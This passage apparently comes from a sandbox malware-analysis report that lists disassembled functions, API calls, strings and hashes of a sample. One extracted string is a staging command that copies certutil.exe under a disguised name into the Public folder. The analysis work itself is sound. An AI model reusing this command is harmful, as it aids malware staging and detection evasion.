                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %04X-%04X$~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2748242238-2468825380
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 200f6bb0e7810f854b9717e2a074cd1fb6e73287ca3de29cc1c1d2ed26bf7d6d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEA19422708BC68AFB65AF21D8402EDB7A1FB45784FE08136D94E4BB68DF7CD6458710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D1526677
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D152668F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _errno.MSVCRT ref: 00007FF7D15266A3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D15266C4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266E4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266FE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2348642995-441775793
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fb79f6ddb9e74c17efb699e0fa1162a98c71d9a5d01a277147ec5e32a658f81b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19715C67908A5BC5F7606F21E45017DF7A0EB55B84FD88077DA4F862A4EFBCA484C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1519400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: FAT$~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2238823677-1832570214
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 686302c50eae59830f77cebb2976c641f63c32b5594705738c4dd562c7fb2684
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D717D32608BC68AFB619F21D8502EDB7A0FB45784FC48476DA4E4BA68DF7CD245C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D884
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D89D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D94D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D964
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D151DB89
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D151DBDF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D151DC63
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT ref: 00007FF7D151DD33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT ref: 00007FF7D151DE9A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151DF1F
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1051989028-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 957e4566b467852bd6dd2149fe9bdda3d17abc3ff524c1842a24231aa66b051f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0026026E0865AC1FB25AB15E44427EB6A1FB44B94FD54232EA9F037A4DFBCD481C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15186B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3223794493-3086019870
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 75b9d129e47d1759fc79ab3cbc8313769d05a4843cc5bd683531d238640ba622
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6517B25A08A4B8AFB55AB15A41017DBBA0EB49B50FD89576CA5F433B0DFBCE085C730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3124875276
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 78f0bc4adeb85e4b318ec9e4e0a25fb9f0dbf271c995ab706c5e3e1363d50ca9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D518866A0CA4B82FB14BF21E4042BDA6A1AF45B45FD08077DA0F862B5DFBCA0058770
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15258E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7D153C6DB), ref: 00007FF7D15258EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D152084E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT ref: 00007FF7D153C1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D153C31C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7D153C5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2242554020-619615743
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e46b99c3994265045476c03cb7eba92e7f2199e383dbb177ad3bf062ac3f51a1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE126D22A1865B81FB60AB15A45417EE2A0EF44BA4FD44237EA9F437F0DFBCE541D720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1526FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D1527013
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D1527123
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152706E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsncmp.MSVCRT ref: 00007FF7D15270A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsstr.MSVCRT ref: 00007FF7D152F9DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152FA00
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152FA5F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152823C: FindFirstFileExW.KERNELBASE ref: 00007FF7D1528280
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D152829D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D153EAC5,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1523A56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152FA3D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: \\.\
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 799470305-2900601889
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 45641eb0eff130fb082ac728d5ba9bfa22c9c976e857eaff00dbf4da17e30bf9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E519432A08A8B85FB60AF10A8002BDB7A1FF85B44FD54576DA4F877A4DFBCD5458320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1518B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1944892715-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 24c231ae65fbe9e86160602db6a3fbe62c011976bf551ddbd33c3040b8e961f3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3B16B22B0964B86FB65BF11A45017DF6A1AF55B84FD58476CA4F4B3B0EEBCE4808730
